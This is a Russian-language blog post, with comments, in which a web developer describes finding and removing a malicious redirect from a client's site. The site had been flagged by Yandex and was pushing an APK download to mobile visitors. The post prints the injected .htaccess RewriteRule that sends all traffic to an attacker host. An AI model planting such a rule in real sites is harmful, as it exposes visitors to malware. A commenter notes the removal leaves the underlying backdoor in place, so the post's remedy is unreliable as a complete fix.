Как я удалил вирус с сайта клиента

Всем привет! Сейчас я расскажу вам о том, что случилось с одним из клиентских сайтов пару дней назад. За несколько лет практики в разработке сайтов я впервые столкнулся с тем, что на одном из созданных мной ресурсов Яндекс.Вебмастером был обнаружен вирус.

Дело было так. Вчера на работе я зашёл в панель управления вебмастера от Яндекса, и каково было моё удивление, когда напротив одного из моих сайтов я увидел такой значок: Как я удалил вирус с сайта клиента и сообщение о том, что в результатах поиска этот сайт помечен как потенциально опасный и содержащий вредоносный код.

Как я удалил вирус с сайта клиента

Сказать, что это повергло меня в шок, — ничего не сказать, так как сайт этот я делал не для себя, а на заказ. Нажав на этот значок, я перешёл на страницу, где было написано, что именно заражено. Естественно, я практически ничего не понял, потому что столкнулся с этим впервые.

Первое, что я сделал, — это написал в техподдержку моего хостинга об обнаруженной Яндексом проблеме и отправил им скриншот из Вебмастера. Спустя некоторое время специалист сообщил мне о том, что сайт был проверен серверным антивирусом, но ничего не было обнаружено.

Второе моё действие — я попытался проверить сайт онлайн-антивирусом. Это тоже не дало никакой информации. А в Вебмастере настойчиво горел значок угрозы, и я стал думать дальше.

Спустя некоторое время я вспомнил о небольшом июльском происшествии, которому я не придал особого значения (к моему стыду и позору). В тот день ко мне в гости приехал брат на выходные, и мы с ним отправились на встречу с тем самым клиентом, о сайте которого я сейчас рассказываю. По дороге я попытался открыть сайт со своего смартфона, чтобы уточнить адрес, но вместо этого мобильный браузер предложил мне скачать файл mobilnaya_versiya.apk. Я ещё тогда удивился, попробовал сделать то же самое со смартфона моего брата, но безуспешно — так же было предложено загрузить apk-шный файл. Я позвонил подруге, попросил её посмотреть адрес с компьютера и забыл об этом.

Но вчера я подумал, что между этой непонятной переадресацией и вредоносным кодом есть какая-то связь. Немного поразмыслив, я решил проверить файл .htaccess, лежащий в корневом каталоге сайта. Как известно, в этом файле прописываются редиректы, поэтому в него я и полез.

Просмотрев все строчки с упоминанием мобильных устройств и различных разрешений экранов, я не обнаружил ничего странного. И тут мне на глаза попалась странная строка:

RewriteRule ^(.*)$ http://server.7od.org/?update&source=%{HTTP_HOST} [L,R=302]

Адрес server.7od.org фигурировал в сообщении о вирусе в Яндекс.Вебмастере. Я ввёл это в браузере и, естественно, увидел предупреждение:

Как я удалил вирус с сайта клиента

Естественно, я сразу же удалил эту строчку из .htacess и незамедлительно отправил сайт на перепроверку антивирусом Яндекса. Мобильная версия сайта после удаления вредоносного кода сразу же заработала нормально.

Сегодня утром я пришёл на работу и увидел, что в Вебмастере пропал красный значок, появилось сообщение о том, что вредоносный код на сайте не был обнаружен, о чём меня известили соответствующим письмом.

Вот такие дела. На этом у меня всё. Надеюсь, что с наступлением осени я всё же стану писать сюда почаще. Также надеюсь, что появятся новые интересные проекты, которые и будут вдохновлять на написание новых постов.

Всем пока, до новых встреч! Берегите свои сайты от заражений и взломов!

 

Комментарии к записи “Как я удалил вирус с сайта клиента” (11)

      • Ну если сначала этого не было... поменяй пароли на всякий случай. Или она была изначально, но в базу вирусов попала совсем недавно.

        • Пароли сменил уже. После читал в интернете, что у пары людей такое же было. Решение вопроса было аналогичным.

          • Интернет- эта сейчас часть нашей жызни.

            Поколение которые после нас... вообще привыкли все делать с помощью него

      • вы удалили только сами последствия вируса, но не сам вирус или shell и уж тем более не закрыли дыру в безопасности, собственно в таком раскладе вам нужно ждать еще подарков.

        Принятые вами меры бесполезны.

  1. проходил уже такое на первом блоге, но у меня в файл шаблона прописался ява скрипт.

  2. Могут хостеры мухлевать. Я читал об этом. Подселяют к клиентам разную херню. Так же доры заливают втихаря.

  3. Получается, что файл .htaccess нужно еще проверять, если что-либо подобное случается. Спасибо за статью.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *